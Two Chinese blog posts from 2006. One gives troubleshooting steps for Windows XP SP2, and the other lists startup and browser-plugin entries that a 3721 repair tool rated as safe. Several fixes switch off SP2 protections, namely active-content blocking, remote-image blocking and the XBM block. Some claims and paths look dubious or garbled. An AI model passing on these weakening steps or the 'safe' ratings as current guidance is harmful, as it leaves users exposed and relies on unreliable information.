这是因为,SP2默认的安全设置为防止用户在本地打开一些FLASH文件过程中,在知情的情况下,被隐藏于FLASH中的恶意代码引导到一些恶意网站,计算机受到攻击,从而禁止了用户在本地(硬盘和光盘)上打开包含有FLASH等内容的文件。
要解决这个问题,可以先启动IE浏览器,点击菜单栏的"工具"|"Internet选项"命令,调出"Internet选项"窗口。点击"高级"选项卡,在"设置"下拉列表框中,将"允许活动内容在我的计算机上的文件中运行"和"允许来自CD的活动内容在我的计算机上运行"选项打上对勾,点"确定"按钮即可。
在局域网中,大家经常通过网上邻居来共享文件和打印机。但是安装SP2之后,在网上邻居中原来可以正常访问的共享打印机却消失得无影无踪。
众所周知,在SP2中,新增了一个Windows防火墙。就是这个防火墙处于安全的考虑,禁止了"文件和打印机共享"功能,所以局域网中的用户往往会出现无法共享资源的故障。
应对这个问题的策略为:依次展开"开始"|"设置"|"控制面板"|"安全中心"|"Windows防火墙"选项,打开Windows防火墙窗口,点击"例外"选项卡,在"程序和服务"列表框中,将"文件和打印机共享"选项打上对勾,点"确定"按钮,并重新启动计算机即可。
安装SP2之后,许多的网络通信软件,如QQ、MSN、Windows Messenger、Windows Netmeeting等等都无法正常使用了。QQ、MSN、Windows Messenger总是弹出安全警报,Windows Netmeeting无法进行远程桌面的共享。
这是由于SP2防火墙在默认情况下,将限制未经允许的来自网络或Internet的入站连接,这样就会造成许多的网络通信软件无法正常工作。
对于QQ、MSN等即可通信软件,我们只需要在弹出的Windows安全警报对话框中点击"解除阻止"按钮即可。对于Windows Messenger、Windows Netmeeting,我们不但需要点击"解除阻止"按钮,而且要将其主程序添加到"例外"中去。点击"开始"|"设置"|"控制面板",在弹出的控制面板窗口中双击"安全中心"选项,弹出"Windows安全中心"窗口,双击其中的"Windows防火墙"选项。在弹出的"Windows防火墙"窗口中,点击"例外"选项卡,接着点击"添加程序"按钮,在弹出的"添加程序"对话框中选中"Windows Messenger",如图7所示,点"确定"按钮,这时Windows Messenger已经可以正常工作了。接着,点击"浏览"按钮,找到位于"X:Program FilesNetMeeting"文件夹中的"Conf.exe",点击"打开"按钮将其添加到"例外"中去。同理,将位于"X:widowsSystem32"目录中的"mnmsrvc.exe"也添加到"例外"中去,点"确定"按钮,Windows Netmeeting的远程桌面共享就正常了。
出现这个问题时,使用OUTLOOK EXPRESS(OE)邮件客户端程序接收邮件的过程中,邮件当中包含的图片无法正常显示,每次都需要在弹出的提示信息中点击"单击此处下载图片"才能够正常显示。
这是因为SP2为防止他人恶性收集用户邮箱信息或利用邮件附件进行恶意攻击,默认情况下,禁止了OE接收邮件过程中显示图片附件的功能的原因。可以采用如下方法解决这个问题:
启动OE,在其主界面中,点击"工具"|"选项"命令,在弹出的选项窗口中,点击"安全"选项卡,在"下载图像"栏中,将"阻止HTML电子邮件中的图像和其他外部内容"前的对勾去掉就可以了。
在访问一些需要验证码的网站时,验证码图片无法正常显示出来。这样会因为无法正确输入网站的验证码而造成无法登录。
这个故障源于在默认情况下,SP2不支持"*.xbm"格式的图片,而网站的验证码图片几乎都是"*.xbm"格式,两者水火不容,所以也就无法显示验证码图片了。
知道了原因,我们只需开启SP2对"*.xbm"格式的图片的支持即可。点击"开始"|"运行",在弹出的运行对话框中输入"REGEDIT",回车后打开注册表编辑器。依次展开如下分支:[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSecurity],在右侧的窗口中找到名为"BlockXBM"的Dword值(没有请新建)并双击,在弹出的编辑对话框中将其数值数据设为"0"后,点"确定"按钮并关闭注册表编辑器。按F5刷新一下,现在再打开一个需要输入验证码的网站试试,显示就会正常了。
网络安全 | 评论:0
| Trackbacks:0
| 阅读:80
Submitted by 海东青 on 2006, February 20, 10:11 PM
igfxtray.exe- Intel图形系统托盘图标,Intel图形系统托盘图标;
hkcmd.exe - Intel芯片组显卡驱动程序工具,Intel芯片组显卡。
还有以下启动项相关资料,资料来自3721的IE修复专家(重在看注释,反正3721的东西我都不是完全相信的,只拿来做参考):
下列条目被IE修复专家判断为安全:
3.R00 - IE自定义搜索引擎 - http://seek.3721.com/srchcust.htm,
内容:http://seek.3721.com/srchcust.htm
安全等级:安全
4.R00 - IE备用搜索引擎 - http://seek.3721.com/srchasst.htm,
内容:http://seek.3721.com/srchasst.htm
安全等级:安全
5.R03 - 搜索挂接 - 上网助手2005,上网助手2005,
CLSID:{BB936323-19FA-4521-BA29-ECA6A121BC78}
相关文件:C:\Program Files\3721\Assist\asbar.dll
[separator]内容:coolbar
安全等级:安全
6.O02 - 浏览器辅助对象(BHO) - 迅雷下载IE相关插件,迅雷下载IE相关插件,
CLSID:{0005A87D-D626-4B3A-84F9-1D9571695F55}
相关文件:C:\WINDOWS\system32\xunleibho_v6.dll
安全等级:安全
7.O02 - 浏览器辅助对象(BHO) - (反钓鱼专家),(反钓鱼专家),
CLSID:{38928D50-8A48-44C2-945F-D2F23F771410}
相关文件:C:\Program Files\3721\Assist\Angling.dll
安全等级:安全
8.O02 - 浏览器辅助对象(BHO) - 360搜,
CLSID:{472101C2-1109-43f4-9112-31F33E3F2127}
相关文件:C:\Program Files\360so\360so.dll
安全等级:安全
9.O02 - 浏览器辅助对象(BHO) - FlashGet 监视网页点击插件,FlashGet 监视网页点击插件,
CLSID:{A5366673-E8CA-11D3-9CD9-0090271D075B}
相关文件:C:\Program Files\FlashGet\Jccatch.dll
安全等级:安全
10.O02 - 浏览器辅助对象(BHO) - Google 工具条,Google 工具条,
CLSID:{AA58ED58-01DD-4d91-8333-CF10577473F7}
相关文件:c:\program files\Google\googletoolbar2.dll
安全等级:安全
11.O02 - 浏览器辅助对象(BHO) - 上网助手2005,上网助手2005,
CLSID:{BB936323-19FA-4521-BA29-ECA6A121BC78}
相关文件:C:\Program Files\3721\Assist\asbar.dll
安全等级:安全
12.O02 - 浏览器辅助对象(BHO) - 网络实名,网络实名,
CLSID:{D157330A-9EF3-49F8-9A67-4141AC41ADD4}
相关文件:C:\WINDOWS\Downloaded Program Files\CnsHook.dll
安全等级:安全
13.O03 - IE第三方工具条 - FlashGet 工具条,FlashGet 工具条,
CLSID:{E0E899AB-F487-11D5-8D29-0050BA6940E3}
相关文件:C:\Program Files\FlashGet\fgiebar.dll
内容:FlashGet Bar
安全等级:安全
14.O03 - IE第三方工具条 - Google 工具条,Google 工具条,
CLSID:{2318C2B1-4965-11d4-9B18-009027A5CD4F}
相关文件:c:\program files\Google\googletoolbar2.dll
安全等级:安全
15.O03 - IE第三方工具条 - 上网助手2005,上网助手2005,
CLSID:{BB936323-19FA-4521-BA29-ECA6A121BC78}
相关文件:C:\Program Files\3721\Assist\asbar.dll
内容:上网助手
安全等级:安全
16.O04 - 自动运行项(Run) - Intel图形系统托盘图标,Intel图形系统托盘图标,
相关文件:C:\WINDOWS\system32\igfxtray.exe
内容:C:\WINDOWS\system32\igfxtray.exe
安全等级:安全
17.O04 - 自动运行项(Run) - Intel芯片组显卡驱动程序工具,Intel芯片组显卡驱动程序工具,
相关文件:C:\WINDOWS\system32\hkcmd.exe
内容:C:\WINDOWS\system32\hkcmd.exe
安全等级:安全
18.O04 - 自动运行项(Run) - 声卡管理优化软件,声卡管理优化软件,
相关文件:C:\WINDOWS\soundman.exe
内容:soundman.exe
安全等级:安全
19.O04 - 自动运行项(Run) - 美萍电脑安全卫士,
相关文件:C:\smenu\smenu.exe
内容:C:\smenu\smenu.exe
安全等级:安全
20.O04 - 自动运行项(Run) - 3721 上网助手,3721 上网助手,
相关文件:C:\Program Files\3721\helper.dll
内容:C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\3721\helper.dll,Rundll32
安全等级:安全
21.O04 - 自动运行项(Run) - 上网助手托盘图标,上网助手托盘图标,
相关文件:C:\Program Files\3721\AssistSe.exe
内容:"C:\PROGRA~1\3721\assistse.exe"
安全等级:安全
22.O04 - 自动运行项(Run) - 360So搜,360So搜,
相关文件:C:\Program Files\360so\360Main.exe
内容:C:\PROGRA~1\360so\360Main.exe
安全等级:安全
23.O04 - 自动运行项(Run) - 下载加速专家,
相关文件:(文件不存在)(隐藏)(系统)rem C:\Program Files\3721\Dlaccel\YDownloader.exe
内容:rem C:\Program Files\3721\Dlaccel\YDownloader.exe
安全等级:安全
24.O04 - 自动运行项(Run) - 3721 网络实名,3721 网络实名,
相关文件:C:\WINDOWS\Downloaded Program Files\CnsMin.dll
内容:Rundll32.exe C:\WINDOWS\downlo~1\CnsMin.dll,Rundll32
安全等级:安全
25.O04 - 自动运行项(Run) - Windows内核检查程序,Windows内核检查程序,
相关文件:C:\WINDOWS\system32\dumprep.exe 0 -k
内容:C:\WINDOWS\system32\dumprep 0 -k
安全等级:安全
26.O04 - 自动运行项(Run) - 瑞星定时查杀程序,瑞星定时查杀程序,
相关文件:D:\Program Files\Rising\Rav\RavTimer.exe
内容:D:\Program Files\Rising\Rav\RavTimer.exe
安全等级:安全
27.O04 - 自动运行项(Run) - 瑞星实时病毒监控程序,瑞星实时病毒监控程序,
相关文件:D:\Program Files\Rising\Rav\RavMon.exe -system
内容:D:\Program Files\Rising\Rav\RavMon.exe -system
安全等级:安全
28.O04 - 自动运行项(Run) - Windows多种输入技术的支持程序,Windows多种输入技术的支持程序,
相关文件:C:\WINDOWS\system32\ctfmon.exe
内容:C:\WINDOWS\system32\ctfmon.exe
安全等级:安全
29.O04 - 自动运行项(RunOnce) - 美萍电脑安全卫士,
相关文件:(文件不存在)(隐藏)(系统)rem C:\smenu\smenu.exe /lock
内容:rem C:\smenu\smenu.exe /lock
安全等级:安全
30.O08 - IE右键菜单 - &使用下载加速专家下载,
相关文件:C:\Program Files\3721\Dlaccel\geturl.htm
安全等级:安全
31.O08 - IE右键菜单 - 使用网际快车下载,
相关文件:C:\Program Files\FlashGet\jc_link.htm
安全等级:安全
32.O08 - IE右键菜单 - 使用网际快车下载全部链接,
相关文件:C:\Program Files\FlashGet\jc_all.htm
安全等级:安全
33.O09 - IE工具栏按钮 - 手机短信,
网页路径:http://sms.3721.com/ie/index.htm
安全等级:安全
34.O09 - IE工具栏按钮 - Yahoo 1G电邮,
网页路径:http://cn.mail.yahoo.com/promo/rd1
安全等级:安全
35.O09 - IE工具栏按钮 - 寻宝乐趣多,寻宝乐趣多,
网页路径:http://hot.3721.com/rd/shop_btn.htm
安全等级:安全
36.O09 - IE工具栏按钮 - 上网助手,
网页路径:http://assistant.3721.com/index.htm?fb=Cns
安全等级:安全
37.O09 - IE工具栏按钮 - 情景聊天,
网页路径:http://cn.rd.yahoo.com/home/mess ... essenger.yahoo.com/
安全等级:安全
38.O09 - IE菜单项 - 修复浏览器,
网页路径:http://assistant.3721.com/security1.htm?fb=Cns
安全等级:安全
39.O09 - IE菜单项 - 清理上网记录,
网页路径:http://assistant.3721.com/clean1.htm?fb=Cns
安全等级:安全
40.O11 - IE高级操作 - !CNS (上网助手-地址栏搜索),
安全等级:安全
41.O21 - 自启动项SSODL - 管理托盘图标对象的程序,管理托盘图标对象的程序,
CLSID:{35CEC8A3-2BE6-11D2-8773-92E220524153}
相关文件:C:\WINDOWS\system32\stobject.dll
内容:{35CEC8A3-2BE6-11D2-8773-92E220524153}
安全等级:安全
42.O27 - 文件执行挂钩 - 网络实名,网络实名,
CLSID:{D157330A-9EF3-49F8-9A67-4141AC41ADD4}
相关文件:C:\WINDOWS\Downloaded Program Files\CnsHook.dll
安全等级:安全
43.O31 - 浏览栏区对象 - 每日提示,每日提示,
CLSID:{4D5C8C25-D075-11d0-B416-00C04FB90376}
相关文件:C:\WINDOWS\system32\shdocvw.dll
安全等级:安全
44.O31 - 浏览栏区对象 - 搜索区,搜索区,
CLSID:{30D02401-6A81-11D0-8274-00C04FD5AE38}
相关文件:C:\WINDOWS\system32\browseui.dll
安全等级:安全
45.O31 - 浏览栏区对象 - File Search Explorer Band,File Search Explorer Band,
CLSID:{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}
相关文件:C:\WINDOWS\system32\shell32.dll
安全等级:安全
46.O31 - 浏览栏区对象 - 收藏区,收藏区,
CLSID:{EFA24E61-B078-11D0-89E4-00C04FC9E26E}
相关文件:C:\WINDOWS\system32\shdocvw.dll
安全等级:安全
47.O31 - 浏览栏区对象 - 历史信息,历史信息,
CLSID:{EFA24E62-B078-11D0-89E4-00C04FC9E26E}
相关文件:C:\WINDOWS\system32\shdocvw.dll
安全等级:安全
48.O36 - Winlogon通知包管理器 - Intel通用界面管理器,Intel通用界面管理器,
相关文件:C:\WINDOWS\system32\igfxsrvc.dll
安全等级:安全
网络安全 | 评论:0
| Trackbacks:0
| 阅读:81